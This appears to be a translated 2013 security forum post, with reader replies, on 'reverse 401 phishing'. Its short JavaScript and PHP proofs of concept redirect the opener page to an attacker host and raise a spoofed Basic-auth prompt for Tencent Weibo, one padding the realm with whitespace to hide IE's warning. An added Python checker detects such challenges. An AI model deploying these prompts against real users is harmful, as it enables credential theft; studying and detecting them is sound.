A new twist on 401 phishing

401 phishing was popular a while back; most variants worked by inserting into a web page an image whose URL answers with a 401, so the victim's browser pops up a login prompt. But this method does not work for Chrome, nor for sites that do not allow externally linked images, such as Weibo.

Reverse 401 phishing:

"Reverse 401" means using opener.location to take control of the page that opened ours (the caller) and redirect it to the 401 phishing page, instead of loading the 401 resource inside the target page.

PoC (runs in the window opened from the target site):

opener.location = 'http://mmme.me/401.php'; // redirect the opener (the target page) to the 401 page
close(); // then close our own window so only the opener remains

401.php:

<?php
header('WWW-Authenticate: Basic realm="t.qq.com"');
header('HTTP/1.0 401 Unauthorized'); // the 401 status is required, otherwise the browser shows no prompt
?>
<script>
history.back(); // go back to Tencent Weibo
</script>

Drawback: IE does not support it.

Tencent Weibo demo

IE whitespace flaw:

Because IE's 401 prompt dialog is badly designed, we can append a large run of whitespace to the realm string in the server's authentication challenge, pushing the dialog's default text out of view and making the prompt misleading.

PoC:

<?php
// realm padded with a long run of spaces (several hundred in the original), so the
// default text after it is pushed out of the visible area of IE's prompt
header('WWW-Authenticate: Basic realm="t.qq.com' . str_repeat(' ', 1000) . '"');
header('HTTP/1.0 401 Unauthorized'); // the 401 status is required for the prompt to appear
?>

IE8: [screenshot]

IE9: [screenshot]
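As an added example (not part of the original post), a header check that a proxy or a log-review script could run to spot the two tricks described above from the defender's side: a Basic realm that names a host other than the one actually serving the challenge, and a realm padded with whitespace. Host names and header values in the samples are constructed.

```python
import re

# Basic challenge: realm is either a quoted-string (backslash escapes allowed) or a token.
_BASIC_RE = re.compile(r'^\s*Basic\s+realm\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,]+))', re.I)
_HOSTNAME_RE = re.compile(r'[a-z0-9-]+(\.[a-z0-9-]+)+')

def parse_basic_realm(header_value):
    """Return the realm of a Basic challenge, or None if the value is not one."""
    m = _BASIC_RE.match(header_value)
    if not m:
        return None
    quoted, token = m.groups()
    return re.sub(r'\\(.)', r'\1', quoted) if quoted is not None else token

def inspect_challenge(serving_host, header_value, max_pad=8):
    """Classify one WWW-Authenticate value served by `serving_host`.

    Returns a list of findings; an empty list means nothing suspicious.
      padded-realm:N   realm carries N trailing whitespace characters (> max_pad)
      foreign-realm:H  realm is a hostname H, but not the host that sent it
    """
    findings = []
    realm = parse_basic_realm(header_value)
    if realm is None:
        return findings
    pad = len(realm) - len(realm.rstrip())
    if pad > max_pad:
        findings.append("padded-realm:%d" % pad)
    name = realm.strip().lower()
    # A realm that reads like a hostname ends up in the user's password prompt;
    # if it is not the host actually serving the 401, the prompt is misleading.
    if _HOSTNAME_RE.fullmatch(name) and name != serving_host.lower():
        findings.append("foreign-realm:%s" % name)
    return findings

# Constructed samples: (host that served the 401, WWW-Authenticate value).
SAMPLES = [
    ("t.qq.com", 'Basic realm="t.qq.com"'),
    ("mmme.me", 'Basic realm="t.qq.com"'),
    ("mmme.me", 'Basic realm="t.qq.com' + " " * 500 + '"'),
    ("intranet.example", 'Basic realm="Staff area"'),
]

if __name__ == "__main__":
    for host, value in SAMPLES:
        print(host, inspect_challenge(host, value) or "ok")
```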

http://pkav.net/2013/01/314.html

1#Xhm1n9 | 2013-01-01 13:00

Heh, learned something.

2#空城 (‮) | 2013-01-01 13:40

Learned something.

3#/fd (Http://prompt.ml) | 2013-01-01 14:11

opener.location seems to have been around for a long time; redirect-based phishing works too.

4#鬼哥 | 2013-01-01 15:16

Nice idea.

5#se55i0n (Those years, the island-nation action films we watched together~) | 2013-01-01 22:45

nice

6#汉时明月 (‮……核审在正长超名签 :) | 2013-01-02 21:47

Learning.

7#El4pse | 2013-01-04 10:54

That's a really long run.

8#/fd (Http://prompt.ml) | 2013-01-04 13:41

Speaking of which, bold ideas like clickjacking seem to have very few real-world cases.

9#shine | 2013-01-04 13:46

@/fd You're writing in Traditional Chinese; not a mainland user?

10#/fd (Http://prompt.ml) | 2013-01-04 13:47

@shine Hong Kong

11#Wdot | 2013-01-04 13:52

That whitespace trick really is a bit of a pain.

12#紫林 (A newbie seeking knowledge) | 2013-09-21 15:26

Seems like this could be used to steal QQ accounts?

13#MEng | 2013-09-21 16:44

Learned something new again.

14#爱上平顶山 | 2013-09-21 19:36

0.0

15#黄小昏 | 2013-09-21 21:10

Learned something new.